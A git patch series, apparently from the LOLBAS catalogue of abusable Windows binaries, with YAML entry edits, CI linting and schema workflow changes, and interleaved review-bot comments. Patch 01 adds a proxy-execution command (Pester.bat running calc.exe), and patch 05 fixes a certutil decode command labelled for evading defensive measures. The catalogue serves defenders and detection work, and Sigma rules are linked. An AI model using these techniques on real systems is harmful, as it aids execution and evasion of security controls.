From fdc1b2c82759f25417c3cedf9ee88d0ce7c1968e Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:44:57 +0200 Subject: [PATCH 01/60] Update pester.bat with an additional example --- yml/OSScripts/pester.yml | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 7d525f8..d3e8b04 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -11,6 +11,13 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 + - Command: Pester.bat ;calc.exe + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Usecase: Proxy execution + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 Full_Path: - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat @@ -20,7 +27,10 @@ Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 + - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' + - Person: Stamatis Chatzimangou + Handle: '@_st0pp3r_' --- From c53a8ea06eb982932ca65c05786d3fe83864d79b Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Tue, 23 Aug 2022 15:47:17 +0200 Subject: [PATCH 02/60] Adjusted comment in command --- yml/OSScripts/pester.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index d3e8b04..96c1fb4 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml 
@@ -12,7 +12,7 @@ Commands: MitreID: T1216 OperatingSystem: Windows 10 - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + Description: Execute code using Pester. Example here executes calc.exe Usecase: Proxy execution Category: Execute Privileges: User From 68a6f0a35f30edc58d59e46ddaf8f35cda958592 Mon Sep 17 00:00:00 2001 From: Oddvar Moe Date: Wed, 24 Aug 2022 12:32:48 +0200 Subject: [PATCH 03/60] added sigma detection for pester --- yml/OSScripts/pester.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index 96c1fb4..bc19377 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -25,6 +25,7 @@ Code_Sample: - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml Resources: - Link: https://twitter.com/Oddvarmoe/status/993383596244258816 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378 From 68c14b894cb29ca1c90036eee88f33d7a7aad70f Mon Sep 17 00:00:00 2001 From: securepeacock <92804416+securepeacock@users.noreply.github.com> Date: Fri, 2 Sep 2022 13:42:59 -0400 Subject: [PATCH 04/60] Update UtilityFunctions.yml (#228) --- yml/OSScripts/UtilityFunctions.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 4850278..b4908a6 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml 
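Review bot: The Sigma link added under Detection references `master`, whereas the entry directly above it pins a commit (`08ca62cc…`), so the new reference will silently break or change meaning whenever the rule is renamed or moved. Pin it the same way: `- Sigma: https://github.com/SigmaHQ/sigma/blob/<commit-sha>/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml`. The same applies to the UtilityFunctions.yml link in patch 04, whose ref `0.21-688-gd172b136b` looks like `git describe` output rather than a branch, tag or SHA, so it is worth confirming that GitHub actually resolves it.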
@@ -16,6 +16,7 @@ Full_Path: Code_Sample: - Code: Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: - Link: https://twitter.com/nickvangilder/status/1441003666274668546 Acknowledgement: From 8810e30f0ab63a126f2ac9ef129c31eee763f1a3 Mon Sep 17 00:00:00 2001 From: Ryan Stamp <32468510+mhogar@users.noreply.github.com> Date: Fri, 2 Sep 2022 13:44:23 -0400 Subject: [PATCH 05/60] Fix incorrect decodehex command syntax (#230) --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index f31d2f7..be67802 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -39,7 +39,7 @@ Commands: Privileges: User MitreID: T1140 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: certutil --decodehex encoded_hexadecimal_InputFileName + - Command: certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName Description: Command to decode a hexadecimal-encoded file decodedOutputFileName Usecase: Decode files to evade defensive measures Category: Decode From 167ae89d1ca73fa436704c79d8cbbbe0809ceef5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 07:02:01 -0400 Subject: [PATCH 06/60] update yaml-lint --- .github/workflows/yaml-linting.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 7b71b07..c0002d4 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -14,6 +14,4 @@ jobs: steps: - uses: actions/checkout@v1 - name: yaml-lint - uses: ibiqlik/action-yamllint@v3 - with: - config_file: .github/.yamllint + uses: ibiqlik/action-yamllint@v3.1.0 From 68aff842918797c26b2d8cb352e62dac7d97a3aa Mon Sep 17 00:00:00 2001 
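Review bot: The Description context line directly below the corrected command still ends with the stray token `decodedOutputFileName`, which this commit (rightly) adds to the command itself; left in both places it makes the description read as a sentence fragment and suggests the argument was never meant to be in the prose. Change it to `Description: Command to decode a hexadecimal-encoded file`. The Commands entry continues outside the hunk.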
From: xenoscr Date: Sat, 10 Sep 2022 07:22:41 -0400 Subject: [PATCH 07/60] adding config --- .github/workflows/yaml-linting.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index c0002d4..2def112 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -15,3 +15,5 @@ jobs: - uses: actions/checkout@v1 - name: yaml-lint uses: ibiqlik/action-yamllint@v3.1.0 + with: + config_file: .github/.yamllint From f64f0d457ecb637737545ab4eca657a1539f9ba8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 16:38:40 -0400 Subject: [PATCH 08/60] Changing linter --- .github/workflows/yaml-linting.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 2def112..74da602 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -12,8 +12,8 @@ jobs: lintFiles: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v1 - - name: yaml-lint - uses: ibiqlik/action-yamllint@v3.1.0 + - uses: actions/checkout + - name: Run yamllint + uses: frenck/action-yamllint with: - config_file: .github/.yamllint + config: ".github/.yamllint" From 4990f5e81d8ccadfa6feaec0e457edf651c19af5 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 16:42:26 -0400 Subject: [PATCH 09/60] fixing workflow --- .github/workflows/yaml-linting.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 74da602..06ea00b 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -12,8 +12,8 @@ jobs: lintFiles: runs-on: ubuntu-latest steps: - - uses: actions/checkout + - uses: actions/checkout@v3 - name: Run yamllint - uses: frenck/action-yamllint + uses: frenck/action-yamllint@v1 with: config: ".github/.yamllint" 
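Review bot: `frenck/action-yamllint@v1` is a third-party action referenced by a mutable tag, so whatever that tag points to in the future runs with this repository's token; pin third-party actions to a full commit SHA and keep the version in a trailing comment, e.g. `uses: frenck/action-yamllint@<commit-sha>  # v1`. The same applies to `reviewdog/action-yamllint@v1` in patches 10 and 11, `ibiqlik/action-yamllint@v3` in patch 13, and every `action-pykwalify` reference in patches 14–19. Dependabot's `github-actions` ecosystem can keep such SHA pins current without manual edits. The job header is outside the hunk.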
From 26c7c404135f2aaf8512d503a8ce658f8d1bf51e Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:06:21 -0400 Subject: [PATCH 10/60] changing linter --- .github/workflows/yaml-linting.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 06ea00b..5b593fc 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -14,6 +14,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Run yamllint - uses: frenck/action-yamllint@v1 + uses: reviewdog/action-yamllint@v1 with: - config: ".github/.yamllint" + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint' From c64d355075a395db296211e21feeb443fd43b5c8 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:17:55 -0400 Subject: [PATCH 11/60] lint changes for push --- .github/workflows/yaml-lint-reviewdog.yml | 17 +++++++++++++++++ .github/workflows/yaml-linting.yml | 17 +++++------------ 2 files changed, 22 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/yaml-lint-reviewdog.yml diff --git a/.github/workflows/yaml-lint-reviewdog.yml b/.github/workflows/yaml-lint-reviewdog.yml new file mode 100644 index 0000000..3cd1dd7 --- /dev/null +++ b/.github/workflows/yaml-lint-reviewdog.yml @@ -0,0 +1,17 @@ +--- +name: YAML Lint with reviewdog +on: + pull_request: + branches: + - master + +jobs: + lintFiles: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Run yamllint + uses: reviewdog/action-yamllint@v1 + with: + reporter: github-pr-review # Change reporter. + yamllint_flags: '--config-file .github/.yamllint' diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 5b593fc..e4ca1bc 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml 
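Review bot: The new yaml-lint-reviewdog.yml workflow posts pull-request reviews through reviewdog but declares no `permissions:` block, so the job runs with the repository's default `GITHUB_TOKEN` scope rather than the minimum it needs; add at the top level `permissions:` / `  contents: read` / `  pull-requests: write`. The same omission applies to validate-yaml-schema.yml in patch 14, which only reads the checkout and should get `permissions: contents: read`. If the repository accepts pull requests from forks, the `pull_request` token is read-only and the review cannot be posted, so the step's own exit status is what will surface failures — worth confirming that is acceptable. The trailing `# Change reporter.` comment is left over from the action's README example and should be dropped.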
@@ -1,20 +1,13 @@ --- -name: YAML Lint -on: - push: - branches: - - master - pull_request: - branches: - - master +name: YAML Lint Push Check +on: [push] jobs: lintFiles: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Run yamllint - uses: reviewdog/action-yamllint@v1 + - name: Frenck's yamllint + uses: frenck/action-yamllint@v1 with: - reporter: github-pr-review # Change reporter. - yamllint_flags: '--config-file .github/.yamllint' + config: ".github/.yamllint" From e25a0e7cb84f3b735b666bef403dae170e1d3ef4 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:24:38 -0400 Subject: [PATCH 12/60] lint changes for push --- .github/workflows/yaml-linting.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index e4ca1bc..8194a73 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -10,4 +10,4 @@ jobs: - name: Frenck's yamllint uses: frenck/action-yamllint@v1 with: - config: ".github/.yamllint" + config: "./.github/.yamllint" From f6761fad95abb8b8352690a87c2e5eb22ac670bd Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 17:33:11 -0400 Subject: [PATCH 13/60] restoring push yamllint action --- .github/workflows/yaml-linting.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index 8194a73..2150f0e 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Frenck's yamllint - uses: frenck/action-yamllint@v1 + - name: yaml-lint + uses: ibiqlik/action-yamllint@v3 with: - config: "./.github/.yamllint" + config_file: .github/.yamllint From 9955d4ea77b40537e3f2adbd34796150cadfd832 Mon Sep 17 00:00:00 2001 
From: xenoscr Date: Sat, 10 Sep 2022 18:03:38 -0400 Subject: [PATCH 14/60] Adding pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 16 ++++ YML-Schema.yml | 92 ++++++++++++++++++++++ 2 files changed, 108 insertions(+) create mode 100644 .github/workflows/validate-yaml-schema.yml create mode 100644 YML-Schema.yml diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml new file mode 100644 index 0000000..666c411 --- /dev/null +++ b/.github/workflows/validate-yaml-schema.yml @@ -0,0 +1,16 @@ +name: Validate YAML Schema + +on: [push, pull_request] + +jobs: + build: + + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v3 + - name: Validate YAML Schema + uses: eliezio/action-pykwalify@v0.3 + with: + files: yml/*/*.yml + schema: YML-Schema.yml diff --git a/YML-Schema.yml b/YML-Schema.yml new file mode 100644 index 0000000..0fb7481 --- /dev/null +++ b/YML-Schema.yml 
@@ -0,0 +1,92 @@ +--- +type: map +mapping: +# Id field enhancement possibility commenting out for now +# "Id": +# type: str +# required: yes +# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' + "Name": + type: str + required: yes + "Description": + type: str + required: yes + "Author": + type: str + required: yes + "Created": + type: str + required: yes + "Commands": + type: seq + sequence: + - type: map + mapping: + "Command": + type: str + required: yes + "Description": + type: str + required: yes + "Usecase": + type: str + required: yes + "Category": + type: str + required: yes + enum: [ADS, AWL Bypass, Compile, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, UAC Bypass, Upload] + "Privileges": + type: str + required: yes + "MitreID": + type: str + required: yes + pattern: 'T[0-9]{4}' + "OperatingSystem": + type: str + required: yes + "Full_Path": + type: seq + required: yes + sequence: + - type: map + mapping: + "Path": + type: str + required: yes + "Code_Sample": + type: seq + required: yes + sequence: + - type: map + mapping: + "Code": + type: str + "Detection": + type: seq + required: yes + sequence: + - type: map + mapping: + "IOC": + type: str + "Resources": + type: seq + required: yes + sequence: + - type: map + mapping: + "Link": + type: str + pattern: 'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+' + "Acknowledgement": + type: seq + required: yes + sequence: + - type: map + mapping: + "Person": + type: str + "Handle": + type: str From 73d02562cd3c2a5ba1d77d519c69e73d6abce747 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:05:47 -0400 Subject: [PATCH 15/60] Attempting to fix pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 666c411..c95f974 100644 
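Review bot: The Detection rule declares only `IOC`, yet the repository's entries also use `Sigma` (patches 03 and 04 in this series add `- Sigma:` items), and pykwalify rejects keys that a `map` does not declare, so this schema will fail those files as soon as the workflow runs; add `"Sigma":` / `  type: str` next to `IOC`. The `MitreID` and `Link` patterns are unanchored, so they accept any value that merely starts with a match; write `pattern: '^T[0-9]{4}(\.[0-9]{3})?$'` to accept sub-techniques while rejecting trailing text, and anchor the URL pattern likewise. In that URL pattern `[$-_@.&+]` is a character range from `$` to `_` (which swallows digits and uppercase letters), not the literal set presumably intended — escape the hyphen: `[$\-_@.&+]`. Finally, `required: yes` is a YAML 1.1 boolean that yamllint's `truthy` rule flags by default; `required: true` is equivalent for pykwalify and lint-clean.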
--- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -10,7 +10,7 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: eliezio/action-pykwalify@v1 with: files: yml/*/*.yml schema: YML-Schema.yml From 059f2419df8c82b9d20a6cdd9734b4a2c8742ccc Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:08:58 -0400 Subject: [PATCH 16/60] Attempting to fix pyKwalify checking --- .github/workflows/validate-yaml-schema.yml | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index c95f974..fab996e 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml @@ -9,8 +9,23 @@ jobs: steps: - uses: actions/checkout@v3 - - name: Validate YAML Schema + - name: Validate OSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 with: - files: yml/*/*.yml + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml + - name: Validate OSLibraries YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml + - name: Validate OSScripts YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml + - name: Validate OtherMSBinaries YAML Schema + uses: eliezio/action-pykwalify@v1 + with: + files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From 285ef35e9b078b9f0f5f9c4bedf1e138188686c0 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:11:14 -0400 Subject: [PATCH 17/60] fixing indents --- .github/workflows/validate-yaml-schema.yml | 24 +++++++++++----------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index fab996e..3ea3364 100644 --- a/.github/workflows/validate-yaml-schema.yml 
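Review bot: The four new steps differ only in the directory name, and duplicating the `uses`/`with` block four times means every future version bump or option change has to be made in four places (patches 18 and 19 already do exactly that). A `strategy.matrix` over the directory names collapses them into one step; set `fail-fast: false` so one failing directory does not cancel the reports for the others. The `build:` job header that the `strategy:` block belongs under is above this hunk.

```yaml
    # … under the `build:` job, above `steps:` (outside this hunk) …
    strategy:
      fail-fast: false
      matrix:
        dir: [OSBinaries, OSLibraries, OSScripts, OtherMSBinaries]
    steps:
      - uses: actions/checkout@v3
      - name: Validate ${{ matrix.dir }} YAML Schema
        uses: eliezio/action-pykwalify@v1
        with:
          files: yml/${{ matrix.dir }}/*.yml
          schema: YML-Schema.yml
```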
+++ b/.github/workflows/validate-yaml-schema.yml @@ -11,21 +11,21 @@ jobs: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml + with: + files: yml/OSBinaries/*.yml + schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml + with: + files: yml/OSLibraries/*.yml + schema: YML-Schema.yml - name: Validate OSScripts YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml + with: + files: yml/OSScripts/*.yml + schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema uses: eliezio/action-pykwalify@v1 - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + with: + files: yml/OtherMSBinaries/*.yml + schema: YML-Schema.yml From 3e57bc35c7a8cb5164a098c64a06a73f3756b618 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:13:35 -0400 Subject: [PATCH 18/60] fixing versions --- .github/workflows/validate-yaml-schema.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 3ea3364..559da82 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml 
@@ -10,22 +10,22 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema - uses: eliezio/action-pykwalify@v1 + uses: eliezio/action-pykwalify@v0.3 with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From 0afb54868ae3c7b232472c9254afdaddd08aa064 Mon Sep 17 00:00:00 2001 From: xenoscr Date: Sat, 10 Sep 2022 18:19:30 -0400 Subject: [PATCH 19/60] Changing to proposed fixed checker cketti/action-pykwalify@v0.3-temp-fix --- .github/workflows/validate-yaml-schema.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/validate-yaml-schema.yml b/.github/workflows/validate-yaml-schema.yml index 559da82..0ebaa39 100644 --- a/.github/workflows/validate-yaml-schema.yml +++ b/.github/workflows/validate-yaml-schema.yml 
@@ -10,22 +10,22 @@ jobs: steps: - uses: actions/checkout@v3 - name: Validate OSBinaries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSBinaries/*.yml schema: YML-Schema.yml - name: Validate OSLibraries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSLibraries/*.yml schema: YML-Schema.yml - name: Validate OSScripts YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OSScripts/*.yml schema: YML-Schema.yml - name: Validate OtherMSBinaries YAML Schema - uses: eliezio/action-pykwalify@v0.3 + uses: cketti/action-pykwalify@v0.3-temp-fix with: files: yml/OtherMSBinaries/*.yml schema: YML-Schema.yml From ce36f924fc40f5ec6e4f4f8299aa3eb1dbf85701 Mon Sep 17 00:00:00 2001 
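Review bot: The workflow now executes `cketti/action-pykwalify@v0.3-temp-fix`, a personal fork of the action tracked by a mutable and explicitly temporary tag, on every push and pull request; the fork owner can move or delete that tag at any time, and nothing in the file records why the fork is used or when to leave it. Pin to the fork's full commit SHA with the tag in a trailing comment, e.g. `uses: cketti/action-pykwalify@<commit-sha>  # v0.3-temp-fix`, and add a comment naming the upstream issue so the pin is moved back to `eliezio/action-pykwalify` once the fix lands. The four steps share this defect; one pinned value repeated four times is another reason to consolidate them.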
From: xenoscr Date: Sat, 10 Sep 2022 22:16:47 -0400 Subject: [PATCH 20/60] Removing extra --- from each yaml file --- Archive-Old-Version/LOLUtilz/OtherBinaries/Nvudisp.yml | 1 - Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml | 1 - Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml | 1 - Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml | 1 - yml/OSBinaries/AppInstaller.yml | 1 - yml/OSBinaries/Aspnet_Compiler.yml | 1 - yml/OSBinaries/At.yml | 1 - yml/OSBinaries/Atbroker.yml | 1 - yml/OSBinaries/Bash.yml | 1 - yml/OSBinaries/Bitsadmin.yml | 1 - yml/OSBinaries/Certoc.yml | 1 - yml/OSBinaries/Certreq.yml | 1 - yml/OSBinaries/Certutil.yml | 1 - yml/OSBinaries/Cmd.yml | 1 - yml/OSBinaries/Cmdkey.yml | 1 - yml/OSBinaries/Cmdl32.yml | 1 - yml/OSBinaries/Cmstp.yml | 1 - yml/OSBinaries/ConfigSecurityPolicy.yml | 1 - yml/OSBinaries/Conhost.yml | 1 - yml/OSBinaries/Control.yml | 1 - yml/OSBinaries/Csc.yml | 1 - yml/OSBinaries/Cscript.yml | 1 - yml/OSBinaries/DataSvcUtil.yml | 1 - yml/OSBinaries/Desktopimgdownldr.yml | 1 - yml/OSBinaries/Dfsvc.yml | 1 - yml/OSBinaries/Diantz.yml | 1 - yml/OSBinaries/Diskshadow.yml | 1 - yml/OSBinaries/Dnscmd.yml | 1 - yml/OSBinaries/Esentutl.yml | 1 - yml/OSBinaries/Eventvwr.yml | 1 - yml/OSBinaries/Expand.yml | 1 - yml/OSBinaries/Explorer.yml | 1 - yml/OSBinaries/Extexport.yml | 1 - yml/OSBinaries/Extrac32.yml | 1 - yml/OSBinaries/Findstr.yml | 1 - yml/OSBinaries/Finger.yml | 1 - yml/OSBinaries/FltMC.yml | 1 - yml/OSBinaries/Forfiles.yml | 1 - yml/OSBinaries/Ftp.yml | 1 - yml/OSBinaries/GfxDownloadWrapper.yml | 1 - yml/OSBinaries/Gpscript.yml | 1 - yml/OSBinaries/Hh.yml | 1 - yml/OSBinaries/IMEWDBLD.yml | 1 - yml/OSBinaries/Ie4uinit.yml | 1 - yml/OSBinaries/Ieexec.yml | 1 - yml/OSBinaries/Ilasm.yml | 1 - yml/OSBinaries/Infdefaultinstall.yml | 1 - yml/OSBinaries/Installutil.yml | 1 - yml/OSBinaries/Jsc.yml | 1 - yml/OSBinaries/Makecab.yml | 1 - yml/OSBinaries/Mavinject.yml | 1 - 
yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 1 - yml/OSBinaries/Mmc.yml | 1 - yml/OSBinaries/MpCmdRun.yml | 1 - yml/OSBinaries/Msbuild.yml | 1 - yml/OSBinaries/Msconfig.yml | 1 - yml/OSBinaries/Msdt.yml | 1 - yml/OSBinaries/Mshta.yml | 1 - yml/OSBinaries/Msiexec.yml | 1 - yml/OSBinaries/Netsh.yml | 1 - yml/OSBinaries/Odbcconf.yml | 1 - yml/OSBinaries/OfflineScannerShell.yml | 1 - yml/OSBinaries/OneDriveStandaloneUpdater.yml | 1 - yml/OSBinaries/Pcalua.yml | 1 - yml/OSBinaries/Pcwrun.yml | 1 - yml/OSBinaries/Pktmon.yml | 1 - yml/OSBinaries/Pnputil.yml | 1 - yml/OSBinaries/Presentationhost.yml | 1 - yml/OSBinaries/Print.yml | 1 - yml/OSBinaries/PrintBrm.yml | 1 - yml/OSBinaries/Psr.yml | 1 - yml/OSBinaries/Rasautou.yml | 1 - yml/OSBinaries/Rdrleakdiag.yml | 1 - yml/OSBinaries/Reg.yml | 1 - yml/OSBinaries/Regasm.yml | 1 - yml/OSBinaries/Regedit.yml | 1 - yml/OSBinaries/Regini.yml | 1 - yml/OSBinaries/Register-cimprovider.yml | 1 - yml/OSBinaries/Regsvcs.yml | 1 - yml/OSBinaries/Regsvr32.yml | 1 - yml/OSBinaries/Replace.yml | 1 - yml/OSBinaries/Rpcping.yml | 1 - yml/OSBinaries/Rundll32.yml | 1 - yml/OSBinaries/Runonce.yml | 1 - yml/OSBinaries/Runscripthelper.yml | 1 - yml/OSBinaries/Sc.yml | 1 - yml/OSBinaries/Schtasks.yml | 1 - yml/OSBinaries/Scriptrunner.yml | 1 - yml/OSBinaries/SettingSyncHost.yml | 1 - yml/OSBinaries/Stordiag.yml | 1 - yml/OSBinaries/Syncappvpublishingserver.yml | 1 - yml/OSBinaries/Ttdinject.yml | 1 - yml/OSBinaries/Tttracer.yml | 1 - yml/OSBinaries/Vbc.yml | 1 - yml/OSBinaries/Verclsid.yml | 1 - yml/OSBinaries/Wab.yml | 1 - yml/OSBinaries/Wlrmdr.yml | 1 - yml/OSBinaries/Wmic.yml | 1 - yml/OSBinaries/WorkFolders.yml | 1 - yml/OSBinaries/Wscript.yml | 1 - yml/OSBinaries/Wsreset.yml | 1 - yml/OSBinaries/Wuauclt.yml | 1 - yml/OSBinaries/Xwizard.yml | 1 - yml/OSLibraries/Advpack.yml | 1 - yml/OSLibraries/Desk.yml | 1 - yml/OSLibraries/Dfshim.yml | 1 - yml/OSLibraries/Ieadvpack.yml | 1 - yml/OSLibraries/Ieframe.yml | 1 - yml/OSLibraries/Mshtml.yml 
